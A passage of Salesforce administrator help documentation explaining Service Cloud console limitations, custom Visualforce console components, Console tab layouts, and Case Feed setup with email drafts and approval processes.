subtabs. For example, you can set account as a primary tab, and cases and contacts as subtabs.

• Call Center users can use the interaction log to write notes in call logs while using a Service Cloud console. A call log is
an activity record that automatically generates when you use the SoftPhone; it tracks the phone number, caller, date, time,
and duration of the call. You can view call logs in the Activity History related list of any record associated with the call.

• If Salesforce Knowledge is set up, turn on the Knowledge sidebar so that console users can automatically see the titles of
articles that might solve cases they're working on.

• We recommend setting up Live Agent completely before including it in a Service Cloud console app.

See Also:
Setting Up a Service Cloud Console
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Service Cloud Console Limitations

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

• A Service Cloud console is only available in Internet Explorer 7, 8, or 9, Firefox 3.5 and above, as well as the most recent
stable version of Chrome.

• A Service Cloud console does not support right-to-left languages, such as Arabic or Hebrew.

• Visualforce pages might not display correctly in a Service Cloud console unless they're updated to show in it.

• All Salesforce CRM Content items display as primary tabs in a Service Cloud console.

• Call center users can only use a SoftPhone in a Service Cloud console if they're using a CTI adapter built with version 3.0
or 4.0 of the CTI Toolkit; or if they’re using a call center built with the Open CTI.

• URLs to Service Cloud console pages might not work when pasted into browsers or selected from bookmarks.

• Service Cloud console apps don’t meet accessibility requirements.

• If you refresh the Change Case Status page in a Service Cloud console, an Unable to Access Page error displays.

• If you leave a Service Cloud console and return to it, any subtabs that were displayed might not automatically reload. Also,
if you leave a Service Cloud console by selecting an app from the Force.com app menu, your browser's Back and Forward
buttons might not work as expected.

See Also:
Setting Up a Service Cloud Console

EXTENDING OR INTEGRATING A CONSOLE

Custom Console Components Overview
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Custom console components let you customize, extend, or integrate the footer, sidebars, highlights panels, and interaction
logs of a Service Cloud console using Visualforce.

For example, you might want to create custom console components that display:

• Third-party apps or data

• Custom highlights panels or interaction logs

• Chat or Softphone widgets

• The location of contacts on Google maps

• Messages from marquees

• New cases on accounts or contacts
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• The next milestones on cases

• Registered products on accounts or contacts

• Similar cases on each case

You can use the Service Cloud Console Integration Toolkit to build custom console components. The toolkit is an API that
uses browsers as clients to display pages as tabs or widgets in console apps. It provides you with programmatic access to console
apps so that you can extend them to meet your business needs. For example, you can use the toolkit to open and close tabs in
a console to streamline a business process. In addition to this, custom console components can display:

• Content in sidebars, highlights panels, and interaction logs, instead of tabs

• Content when users click a customizable button in the footer

• Information without users having to click a button or link

• Content when users view specific pages

• Contextual information alongside records

• Small amounts of information on pages

For more information (English only) about the toolkit, see the Service Cloud Console Integration Toolkit Developer's Guide.

Creating a custom console component typically involves these steps:

1. Developers create a Visualforce page.
2. Administrators add the Visualforce page to either:

• Page layouts to display content on specific pages or
• Service Cloud console apps to display content across all pages and tabs

3. Administrators determine the width and location of the component in the console.
4. Administrators who add a component to apps:

• Specify the look and feel of the button used to access the component from the footer
• Assign the component to each console where they want users to access it

5. Users view the component when they access page layouts or click a button in the footer of a console.

See Also:
Setting Up a Service Cloud Console
Adding Custom Console Components
Custom Console Components Implementation Tips
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Adding Custom Console Components
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To add custom console components:

“Customize Application”To create Visualforce pages:

After you create a custom console component (Visualforce page), you can add it to page layouts or Service Cloud console apps.
Add a component to page layouts if you want users to access your component from the sidebars of specific pages, such as cases
or accounts. Add your component to an app if you want users to access your component from a button on the footer of any
page or tab, such as a chat or SoftPhone widget, which is useful from any location.

• Adding Custom Console Components to Page Layouts
• Adding Custom Console Components to Apps

See Also:
Custom Console Components Overview
Custom Console Components Implementation Tips
Setting Up a Service Cloud Console

Adding Custom Console Components to Page Layouts

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To add custom console components:

“Customize Application”To create Visualforce pages:

After you create a custom console component (Visualforce page), you can add it to page layouts so that users can access it from
a sidebar in a Service Cloud console.

1. For standard objects, from Setup, click Customize > Object > Page Layouts.

For custom objects, from Setup, click Create > Objects, then choose the object.

2. Click Edit next to a page layout.
3. Click Custom Console Components.

4. Next to the sidebar in which you want to add your component, type the name of the Visualforce page, or click  to find
and select the Visualforce page.
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5. Enter the height or width of the component as it should display in a console.
6. Click Save.

See Also:
Adding Custom Console Components to Apps
Custom Console Components Overview

Adding Custom Console Components to Apps

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To add custom console components:

“Customize Application”To create Visualforce pages:

After you create a custom console component (Visualforce page), you can add it as a button in the footer of Service Cloud
console apps for user access.

1. From Setup, click Customize > Service Cloud Console > Custom Console Components.
2. Click New.
3. Type a name for your component.
4. Click Hide to hide your component from console users.

Hidden components don’t display to console users, but they can still function in the background.

5. In Button Name, type the label that will display on the button users click to launch your component. For example, Live
Chat.

6. In Button CSS, enter the in-line style used to define how the button looks to users who click it to launch your component.
7. Enter the width of the button as it should display in the console.

8. In Visualforce Page, type the name of your component, or click  to find and select it.
9. Enter the height and width of the window used to display your component in the console.
10. Click Fixed Width or Fixed Height to prevent users from changing the dimensions of the window used to display

your component.
11. Click Save.

Before users can access your component, you must assign it to each console where you want users to access it. See Assigning
a Custom Console Component to an App on page 2132.

See Also:
Adding Custom Console Components to Page Layouts
Custom Console Components Overview
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Assigning a Custom Console Component to an App

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Customize Application”To assign custom console components to an app:

After you add a custom console component to Service Cloud console apps, you must assign it to each console where you want
users to access it.

1. From Setup, click Create > Apps.
2. Select a Service Cloud console app.
3. Click Edit.
4. In Choose Custom Console Components, add any available components to your app.
5. Click Save.

See Also:
Adding Custom Console Components to Apps

Custom Console Components Implementation Tips
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

• Only users assigned to the Service Cloud User feature license can add custom console components to page layouts.

• Custom console components don't refresh automatically when users update records on primary tabs or subtabs.

• You can't delete Visualforce pages that are assigned to page layouts as custom console components.

• You can use a Visualforce page as a component once for each page layout.

• You can add a Visualforce page as a component to the Top Sidebar or Bottom Sidebar of primary tabs after you turn off
the highlights panel or interaction log on the appropriate page layouts.

• Unlike other Visualforce pages, you don't have to set the standard controller on custom console components to the object
whose page layout you're customizing.

• Two URL parameter values are passed automatically to Visualforce pages used as custom console components:

DescriptionParameter ValueParameter Name

The ID of the detail page in which the
component displays.

This parameter is only passed if the ID
is available.

A case-sensitive 15-character
alphanumeric string that uniquely
identifies a record.

id
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DescriptionParameter ValueParameter Name

Indicates the Visualforce page displays
as a component in a Service Cloud
console.

trueinContextPane

• If you want a custom console component to display across all of the subtabs in a primary tab, we recommend that you add
the component to the Primary Tab Components section on page layouts. Adding a component to the Subtab Components
section on page layouts displays the component on individual subtabs.

• If Salesforce Knowledge is enabled and the Knowledge sidebar is turned on, we recommend that you don't add a custom
console component to the Right Sidebar of a console on case page layouts. This is because the Knowledge sidebar
automatically displays over components in such cases.

• If you change the Height or Width of a custom console component, we recommend that you refresh your browser before
you view your updates.

• If you add showHeader=true to a Visualforce page, you can add a 15–pixel gap to the right and left sides of a custom
console component to visually indicate its location in a sidebar. For example, <apex:page
standardController="Contact" showHeader="false" title="List of Cases">.

See Also:
Custom Console Components Overview
Adding Custom Console Components

CONSOLE TAB

Setting Up the Console Tab
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up the Console tab:

You can quickly set up the Console tab so that users have all the information they need on one screen when working with
Salesforce. To set up the console:

1. Create console layouts to define what objects are available to users in the console's list view frame.
2. Choose the related objects to show in the mini view.
3. Define mini page layouts to customize the fields and related lists of the objects that display in the console's mini view.
4. Assign profiles to a console layout to provide users access to specific objects in the console's list view.
5. Add the Console tab to custom apps so that users can access the console from specific apps.
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Note:

• You can't add the Console tab to partner portals or customer portals.

• Visualforce pages might not display properly in the Console tab, as there is no cross-domain communication
between Salesforce and Visualforce domains. However, advanced administrators and developers can implement
custom functionality with Visualforce in the Service Cloud console by using an integration toolkit. For more
information, see Custom Console Components Overview on page 2128.

See Also:
Tip sheet: Using the Console

Creating Console Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create console layouts:

To create a layout for the Console tab:

1. From Setup, click Customize > Console > Console Layouts.
2. Click New and optionally choose an existing layout to clone.
3. Enter a name for the new layout.
4. Click Save.
5. Click Edit in the Selected List Views section.
6. To add or remove objects to the layout, select an object, and click the Add or Remove arrow.

To change the order of the objects as they will appear in the console's list view frame, select an object in the Selected List
box, and click the Up or Down arrow.

A user can only view objects in the console's list view frame if those objects are added to the console layout to which their
profile is assigned.

7. Click Save.
8. Next, choose the related objects to show in the mini view of the console.

See Also:
Managing Console Layouts
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Customizing Console Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize console layouts:

To customize layouts for the Console tab:

1. From Setup, click Customize > Console > Console Layouts.
2. Select a layout name.
3. To modify the Name or Description of the layout, click Edit in the Console Layout Detail section.
4. To add or remove objects to the layout, click Edit in the Selected List Views section, select an object, and click the Add

or Remove arrow.

To change the order of the objects as they will appear in the console's list view frame, select an object in the Selected List
box, and click the Up or Down arrow.

A user can only view objects in the console's list view frame if those objects are added to the console layout to which their
profile is assigned.

5. Click Save to finish.

See Also:
Managing Console Layouts

Deleting Console Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To delete console layouts:

To delete a layout for the Console tab:

1. From Setup, click Customize > Console > Console Layouts.
2. Click Del next to the console layout name.
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Note:  You cannot delete a console layout that is assigned to a profile. You must first reassign the profile to another
console layout or no console layout.

See Also:
Managing Console Layouts

Managing Console Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, delete, and assign console layouts:

Console layouts define what objects are available to users in the Console tab's list view frame. For example, if you want users
to see list views of cases and contacts in the console, then you would add both cases and contacts to a console layout, and then
assign that console layout to the appropriate user profiles. A user can only view objects in the console's list view frame if those
objects are added to the console layout to which their profile is assigned.

From the console layouts list page, accessed in Setup by clicking Customize > Console > Console Layouts, you can:

• Click New to create layouts.

• Click Edit to modify a layout.

• Click Del to delete a layout.

• Click Console Layout Assignment to assign console layouts to profiles.

See Also:
Setting Up the Console Tab
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Choosing Related Objects for the Console's Mini View

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up the Console tab:

While you can choose which related objects appear in the Console tab's mini view, you can only choose objects with a lookup
or master-detail relationship on the primary object. For example, from the cases object, you can choose account and contact
because cases have account and contact lookup fields.

1. For standard objects, from Setup, click Customize and choose a standard object. For custom objects, from Setup, click
Create > Objects and choose a custom object.

The standard or custom object you choose in this step represents the record in the detail view of the console, and the related
objects in the mini view will be records associated with it.

2. Next to a page layout name, click Edit.
3. In the page layout header, click Mini Console View.
4. To select which related objects will be displayed in the mini view, select a field name, and click Add or Remove. You can

select objects only if they are defined as lookup relationships and those lookup fields are included on the page layout. To
change the order of the related objects in the mini view, select a field name in Selected Relationship Fields, and click Up
or Down. Click Save when finished.

5. Click Save.
6. Next, define mini page layouts to specify the fields and related lists to show for the related objects in the mini view.

Tip:  The fewer related objects you add to the Console tab's mini view, the easier it is for users to read the information
displayed. The console can also process data faster when fewer related objects are added to the mini view.

Note:  You cannot choose related objects for the Close Case Layout or the Log a Case Page and View Cases Page
layouts on the Self-Service Portal.

See Also:
Setting Up the Console Tab
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Defining Mini Page Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up the Console tab:

You can define mini page layouts for the records that appear in the mini view of the Console tab, hover details, and event
overlays. A mini page layout contains a subset of the items in an existing page layout. Mini page layouts inherit record type
and profile associations, related lists, fields, and field access settings from their associated page layout. The visible fields and
related lists of the mini page layout can be further customized, but the other items inherited from the associated page layout
cannot be changed on the mini page layout itself.

The event mini page layout is used for the event detail and edit overlays, not the Console tab. Related lists on mini page layouts
only display in the Console tab, not hover details.

1. For standard objects, from Setup, click Customize and choose a standard object. For custom objects, from Setup, click
Create > Objects and choose a custom object.

2. Next to a page layout name, click Edit.
3. In the page layout header, click Mini Page Layout.
4. Select which fields and related lists will be displayed for this type of record in the mini view. For each related list you select,

choose which fields to display in that related list.

• You can select all of the available fields and up to five related lists to display in the console; however, it is recommended
that you only select a few so that users do not have to scroll to find information.

• Selected fields and related lists display in the console even when they do not contain content.
• Fields marked Always Displayed or Always on Layout on page layouts are automatically included on the mini

page layout and cannot be removed unless they are removed from the page layout.
• Field properties on the page layout determine field properties on the mini page layout. For example, if a field is read-only

on the page layout, that same field will be read-only on the mini page layout. To change the field properties of fields
on the mini page layout, you must change the field properties of fields on the page layout. Note that the console respects
field-level security in organizations where it is available.

• To add or remove fields, select a field name, and click Add or Remove. To change the order of the fields, select a field
name in Selected, and click Up or Down. Click Save when finished.

• The order of related lists on the page layout determines the order of related lists on the mini page layout. To change
the order of related lists on the mini page layout, you must change the order of related lists on the page layout, then
select the mini page layout and click Save.

5. Click Save.
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Note:  You cannot define mini page layouts for the Close Case Layout or the Log a Case Page and View Cases Page
layouts on the Self-Service Portal.

You can define mini page layouts for the user object; however, you cannot add standard fields or related lists. Also,
a customized mini page layout won’t display in the Console tab.

See Also:
Setting Up the Console Tab

Assigning Console Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To assign console layouts:

After you create console layouts, assign which layouts users see on the Console tab. A user’s profile determines which console
layout he or she sees.

To assign console layouts:

1. From Setup, click Customize > Console > Console Layouts.
2. Click Console Layout Assignment.
3. Select a console layout to assign to a profile via the drop-down list.
4. Select the Console tab visibility settings for a profile via the drop-down list. You can only select Console tab visibility

settings for profiles assigned to a console layout.
5. Click Save.

Note:  Enterprise, Unlimited, and Developer Edition users with the “Customize Application” permission can assign
a console layout to a profile via the profile detail page by clicking the Edit link in the Console Settings section.

See Also:
Managing Console Layouts

2139

Setting Up the Console TabSetting Up the Support Agent Experience



CASE FEED

Setting Up Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application”

To set up and customize Case Feed:

Prerequisites

Before you enable and customize Case Feed:

• Enable Chatter and publisher actions.

• Enable feed tracking on cases. On the feed tracking page, turn off tracking for the Status field. This prevents duplicate
feed items when agents update a case’s status using the Change Status publisher.

• Decide which actions and tools you need:

◊ To use the Email action, set up Email-to-Case.

◊ To use the Portal action, set up a customer portal, a partner portal, or Chatter Answers.

◊ To use the articles tool, set up Salesforce Knowledge.

• Review how cases are upgraded when you enable Case Feed.

Setting up Case Feed: The Basics

• Enable Case Feed in your organization.
• Decide how you’ll give users access:

◊ By creating permission sets and assigning them to users
◊ Through custom profiles

• Know what to expect after you enable Case Feed.

Setting up Case Feed: Adding More Functionality

Follow these optional steps to add more functionality to Case Feed.

• To let agents include short, pre-written messages in their emails, set up Quick Text and create Quick Text messages.
• To give agents the option of emailing customers to let them know when questions they’ve posted to a portal have been

answered, enable portal email notifications.
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• To let agents save email messages as drafts before sending them, and to make it possible to create approval actions for
email, enable email drafts.

• Create text, HTML, or Visualforce email templates to help agents save time and increase consistency.
• Create custom actions to give agents access to additional functionality.

Customizing Case Feed

Finally, customize Case Feed based on your company’s needs and how your support agents work.

• Create layouts for case detail and close case pages and highlights panels.
• Create layouts for feed view pages to specify which publishers, fields, and tools agents see when they’re working with cases.

See Also:
Turning On Chatter
Enabling Publisher Actions

Enabling Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application

To change support settings:

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit.
3. Select Case Feed Enabled .
4. Click Save.

Once you enable Case Feed, your cases are upgraded to the new user interface automatically. We recommend waiting until
this upgrade process is finished to give users access to Case Feed.

See Also:
Setting Up Case Feed
Case Feed Upgrade Results
Assigning Case Feed to Users
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Creating Permission Sets for Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create permission sets:

After you enable Case Feed for your organization, create a permission set to give users access to it.

1. Create a permission set for Case Feed.
2. On the Permission Set page, click App Permissions.
3. Select Use Case Feed. Optionally, select any other permissions you want to include in the set.
4. Click Save.

Tip:  If you have an existing permission set, you can edit it to include the Use Case Feed permission.

See Also:
Setting Up Case Feed
Assigning Case Feed to Users

Assigning Case Feed to Users

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application

To change support settings:

After you’ve enabled Case Feed for your organization and created a permission set that includes it, you need to assign the
permission set to users so that they can use Case Feed.

1. From Setup, click Manage Users > Users.
2. Select a user’s name.
3. In the Permission Set Assignments list, click Edit Assignments.
4. Select the permission set you want in the Available Permission Sets list, and then click Add.
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5. Click Save.

See Also:
Setting Up Case Feed

Enabling Case Feed in Custom Profiles

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create and edit profiles:

Instead of giving users access to Case Feed by creating permission sets and assigning them to users, you can create a custom
profile that includes the Use Case Feed user permission.

1. Create a new profile.
2. On the Profile page, click Edit.
3. In General User Permissions, select Use Case Feed.
4. Click Save.
5. Assign users to the profile.

See Also:
Setting Up Case Feed

Case Feed Upgrade Results

Available in: Enterprise, Unlimited, and Developer Editions

When you enable Case Feed for your organization, an upgrade process runs to convert active cases to the new interface. During
the upgrade process, users won’t notice anything different. After the process is complete, users for whom you've enabled Case
Feed see existing and new cases in the new interface, while users without Case Feed continue to see traditional cases.

When you upgrade cases to the new interface, the following happens:

• The 5000 most recent, active cases in your organization are converted to the Case Feed interface. How long this takes
varies depending on the number of cases being converted and the complexity of the data they contain. For example, cases
with multiple email messages or other attachments may take longer to convert than other cases.
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• Older cases are also upgraded if they have comments, emails, or logged calls that were added to the case within the date
range that applies to the original 5000 converted cases. You can have up to 500 cases with current comments, up to 500
with current emails, and up to 500 with current logged calls for a total of 1500 additional converted cases.

• The following items are added to the feed for each case:

◊ Up to 60 email messages.

◊ Up to 60 private and public comments. These are converted from comments to Chatter posts during the upgrade.

◊ Up to 60 logged calls. Some logged calls that were created before you upgraded to Case Feed may appear in the feed
as tasks.

• The Case Feed interface is enabled for all new cases, giving users access to the publishers and feed.

• The Case Detail page becomes available, and contains additional information about the case, including items that remain
in their current related lists.

You’ll receive an email message once the upgrade process has finished.

Best Practices

• For the smoothest upgrade experience, we recommend enabling Case Feed in a full-copy sandbox organization before you
enable it in your production organization. This helps you determine how long the case conversion process takes and lets
you review some sample cases in the new user interface.

• After you enable Case Feed in your production organization, wait until the upgrade process has finished to give users
access. We recommend first assigning Case Feed to a single user, who can review some of the converted cases to be sure
the upgrade process was successful, and then making it available to other users.

See Also:
Setting Up Case Feed
Enabling Case Feed

Enabling Portal Reply Email Notifications in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application”

To change support settings:

If your organization uses a portal, support agents can use the Portal publisher (which is part of the Answer Customer publisher)
in Case Feed to respond to customers. Enabling portal reply email notifications gives agents access to the Send Email option
in the Portal publisher.

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit.
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3. Select Enable Case Comment Notification to Contacts.
4. Select a template for email notifications.
5. Click Save.

See Also:
Setting Up Case Feed

Enabling Email Drafts in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Customize Application

To change support settings:

Before enabling draft emails, set up Email-to-Case and Case Feed.

Enabling draft emails gives support agents who use Case Feed the ability to write and save messages without having to send
them immediately. This option also makes it possible to implement approval processes so messages can be reviewed by
supervisors or senior agents before they’re sent to customers.

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit.
3. Select Enable Email Drafts.
4. Click Save.

Note:  Changes to fields other than To, From, CC, BCC, and Subject in the Email publisher aren’t saved when a
message is saved as a draft. We recommend removing any additional fields from the Email publisher if you plan to
use draft emails.

See Also:
Setting Up Case Feed
Creating Approval Processes for Email Drafts
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Using Custom Actions in Case Feed
You can use Visualforce pages as custom actions in Case Feed to give support agents easy access to additional functionality.

Available in: Enterprise, Unlimited, and Developer Editions

Actions in Case Feed let support agents perform tasks like emailing customers, writing case notes, and changing the status of
a case. Using Visualforce pages, you can create custom actions that offer agents more functionality.

Here are some examples of custom actions:

• A Case Comment action that lets agents write comments on cases longer than the standard 1000 characters for case notes.

• A Map and Local Search action that lets agents look up the customer’s location and find nearby service centers.

• An Entitlements action that shows the service level agreement (SLA) status—such as past due, on time, or time to
milestone—on a case and lets agents mark milestones as complete.

You can use any Visualforce page that uses the standard case controller as a custom action.

See Also:
Setting Up Case Feed
Adding Custom Actions in Case Feed
Developer’s Guide: Customizing Case Feed with Visualforce

Adding Custom Actions in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To add custom actions to Case Feed:

You can use any Visualforce page that uses the standard case controller as a custom action.

Note:  If you’ve opted to use the advanced page layout editor to configure the publisher for a Case Feed layout, see
Configuring the Case Feed Publisher Using the Advanced Page Layout Editor  for instructions on adding actions.

1. From Setup, click Customize > Cases > Page Layouts.

2. In Page Layouts for Case Feed Users, click  next to a layout and choose Edit feed view.
3. Click + Add a Visualforce Page in the list of custom actions.
4. Select the page you want to add as an action.
5. Specify the height of the action in pixels.
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6. Click Save.

See Also:
Setting Up Case Feed
Using Custom Actions in Case Feed
Developer’s Guide: Customizing Case Feed with Visualforce

Overview of Page Layouts in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit page layouts:

“Manage Users”To assign page layouts:

There are four types of page layouts you can customize in Case Feed:

• Feed views, which users see when managing and interacting with cases.

• Detail views, which users see when they click View Case Details.

• Highlights panels, which appear at the top of both feeds and case detail pages.

• Close case views, which appear when users close cases from the case detail page.

You can create, edit, and assign all four types of layouts from the Case Page Layout page in Setup by clicking Customize >
Cases > Page Layouts.

See Also:
Creating and Editing Feed Layouts in Case Feed
Configuring the Case Feed Publisher Using the Advanced Page Layout Editor
Editing the Highlights Panel in Case Feed
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Editing the Highlights Panel in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit page layouts:

“Manage Users”To assign page layouts:

The highlights panel displays information about the case at the top of the feed and the case detail page. You can edit the
highlights panel to include the fields that are most important for your support agents.

1. From Setup, click Customize > Cases > Page Layouts.

2. In Page Layouts for Case Feed users, click  next to a layout and choose Edit detail view.

3. Hover your mouse pointer over the Highlights Panel until the  icon appears, then click it.
4. On the Highlights Panel Properties page, click a box to edit the fields in it.
5. Use the drop-down list to choose the type of information to include in each field. To leave a field blank, choose None.

You can’t move or delete Case Number or Created Date.
6. Click OK.

See Also:
Setting Up Case Feed

Creating and Editing Feed Layouts in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit page layouts:

“Manage Users”To assign page layouts:

Feed view page layouts determine which actions, fields, and tools Case Feed users see when they’re working with cases. You
can create different layouts and assign them to different user profiles. For example, you might have one layout for agents and
another for supervisors.

Before creating a new feed view page layout, you need to create a new case detail page layout.

To create a new feed view page layout or edit an existing one:

1. From Setup, click Customize > Cases > Page Layouts.
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2. In Page Layouts for Case Feed Users, click  next to a layout and choose Edit feed view.
Note: If you’ve already opted to use the advanced page layout editor to configure the publisher for a layout, choose Edit
detail view to add, change, or remove publisher actions.

3. To use the advanced page layout editor to choose the actions that appear in the Case Feed publisher, select Use Page
Layout Editor to Configure Actions and follow these steps. Otherwise,

• Choose where you want the publisher menu to appear on the page: in the left column or in the center column.
• Select the publishers you want to include on the Case Feed page. You must include the Write Case Note publisher.

4. If you choose to use the Log a Call action, select the fields you want to include in it. For example, if you want to include
Account Name, move it from Available Fields to Selected Fields.

5. If you choose to use the Change Status action, select the fields you want to include in it when a case’s status is changed.
6. If you choose to use the Email action (which is part of the Answer Customer action), select the fields you want to include

in it.
7. Optionally:

• Select which header fields to include.
• Select which email tools to make available to agents.
• Enable the rich text editor on page 1708. You can also require that agents use this editor when writing emails.
• Specify From addresses. To use multiple addresses, separate them with commas.
• Allow the body field to be collapsible. If you select this option, the body field is collapsed until an agent clicks within

it.
• Allow the email header to be collapsible. If you select this option, the header is collapsed until an agent clicks on it.
• Choose a button to replace the standard Send Email button in the Email publisher. You can use any custom button

you’ve created for cases, except those that have s-controls as content sources.

8. Select the tools you want to make available on the Case Feed page.
9. Optionally, if you’re using the articles tool:

• Select Enable Email PDF Attachment Option to give agents the ability to attach articles to email messages as
PDFs.

• Select Use Case Feed Articles Tool in Console to replace the standard Salesforce Knowledge sidebar in
the Service Cloud console with the Case Feed articles tool.

10. Select the buttons, lists, and links you want to include, and specify where on the page you want them to appear.
11. Choose where and how you want the filters list to appear:

• As a fixed list in the left column
• As a floating list in the left column
• As a drop-down list in the center column

12. Choose the feed filters you want to include on the page.
13. Click Save.

Once you’ve created or edited feed view page layouts, assign them to profiles.

Note:

• You can’t include rich text area fields in Case Feed actions.
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• Custom links and buttons are only available as right sidebar components on the feed view page layout if you’ve
added them to the related case detail page layout.

See Also:
Overview of Page Layouts in Case Feed
Configuring the Case Feed Publisher Using the Advanced Page Layout Editor

Configuring the Case Feed Publisher Using the Advanced Page Layout
Editor

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure the Case Feed publisher:

If your organization uses the publisher actions feature, you can use the advanced page layout editor to choose the actions that
appear in the Case Feed publisher. (This option is selected by default for new Salesforce organizations that use Case Feed,
and for organizations that enable Case Feed after the Summer ’13 release.)

1. From Setup, click Customize > Cases > Page Layouts.

2. In Page Layouts for Case Feed Users, click  next to a layout and choose Edit feed view.
3. Select Use Page Layout Editor to Configure Actions.
4. Click Save.

5. Click  next to the layout and choose Edit detail view.

6. In the page layout editor, click  in the Publisher Actions section.
7. In the palette, click Actions.
8. Drag the actions you want to the Publisher Actions section. You can also drag actions to change the order in which they

appear, and can drag off actions you don’t want.
On the Case Feed page, up to approximately five or six actions are displayed in the publisher; the rest are included in the
More drop-down list.

9. Click Save.

When you use the advanced page layout editor to configure the Case Feed publisher, you’ll notice these differences:

• The actions list appears at the top of the publisher. You can no longer position the actions list to the left of the publisher.
• The Answer Customer action has been divided into its two component actions: Email and Portal.
• The publisher actions list has a different look from what you’re used to seeing in Case Feed: it now looks more like the

Chatter publisher on other pages.
• The four standard Chatter actions—Post, File, Link, and Poll—automatically appear in the publisher layout, and they

replace the Write Case Note action. You can change the sequence of these actions and remove any you don’t need.
• The Feed View/Details drop-down list replaces the View Case Detail action.
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• Custom actions you previously added to the Case Feed publisher aren’t automatically available. You need to create new
custom actions and add them to the publisher, and these actions must use publisher.js rather than interaction.js.

• The Case Detail page expands to full width, making it easier to see all of your related lists and other information.

See Also:
Overview of Page Layouts in Case Feed
Creating and Editing Feed Layouts in Case Feed

Enabling Default Email Templates in Case Feed
Using default email templates in Case Feed gives support agents easy access to the templates they need based on the types of
cases they’re working on.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable default email templates:

Before you can enable default email templates, you need to create text, HTML, or Visualforce templates, and create an Apex
class that contains template selection logic.

Default email templates make it easy for support agents to respond to customers more quickly, more accurately, and with
greater consistency. The email templates are preloaded, so agents don’t need to browse for the templates they need before
writing email. You can create as many templates as needed and assign them based on your company’s needs. For example, if
your support center handles issues related to multiple products, you can create a specific template for each product and preload
the appropriate template based on a case’s origin, subject, or other criteria.

To enable default email templates:

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit.
3. Select Enable default email templates.
4. Choose the Apex class that contains your template selection logic.
5. Click Save.

See Also:
Creating Send Actions
Creating Approval Processes for Email Drafts
Reviewing and Approving Email Drafts
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Creating Send Actions
Send actions link draft email messages to approval processes.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create Send actions:

Send actions are available only in organizations that have email drafts enabled.

Send actions make it possible for email messages to be sent at the end of an approval process.

1. From Setup, click Create > Workflow & Approvals > Send Actions.
2. Click New Send Action.
3. Select Email Message from the object drop-down list.
4. Enter a unique name for the action.
5. Optionally, enter a description for the action.
6. Click Save.

After you create a send action, create an approval process that includes it.

See Also:
Enabling Default Email Templates in Case Feed

Creating Approval Processes for Email Drafts
Create approval processes to specify how your organization handles email drafts.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

Approval processes determine how your organization handles draft email messages—specifying, for example, which messages
require approval and whether approvers are automatically assigned. You can create customized approval processes based on
your company’s needs.

1. Enable draft emails.

Though you can create approval processes for email messages without this step, those processes won’t be triggered until
your organization has email drafts available.

2. Create a send action.
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Send actions ensure that email messages are sent once they’ve been approved.

3. Create approval processes.

Be sure to choose Email Message from the Manage Approval Processes For: drop-down list.

4. To give certain users, such as senior support agents, the ability to choose whether to submit an email message for approval
or simply send the message, assign them to a profile that has the Bypass Email Approval permission selected.

See Also:
Creating Send Actions
Enabling Default Email Templates in Case Feed

Reviewing and Approving Email Drafts

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”

AND
Inclusion in an email approval process

To review and approve email drafts:

Depending on how your administrator has set up draft emails and approval processes for your organization, you may need to
review and approve messages written by the agents you oversee before those messages are sent to customers. When an agent
submits a message for approval, you receive an email notification with a link to the case that includes the message. A notice
appears at the top of the publisher when you click Email. Click View email to go to the message detail page. On that page:

• Click Unlock Record to make the message editable.

• Click Delete to discard the draft.

• Click Approve/Reject in the Approval History related list to approve or reject the message.

• Click Reassign to assign the approval to another supervisor.

If you approve the message, it’s sent to the customer. If you reject it, you have the option of writing a note explaining why.
This note appears above the publisher on the case page when the agent clicks Email, along with a notice that the draft has
been rejected.

See Also:
Working with Draft Emails
Enabling Default Email Templates in Case Feed
Creating Approval Processes for Email Drafts
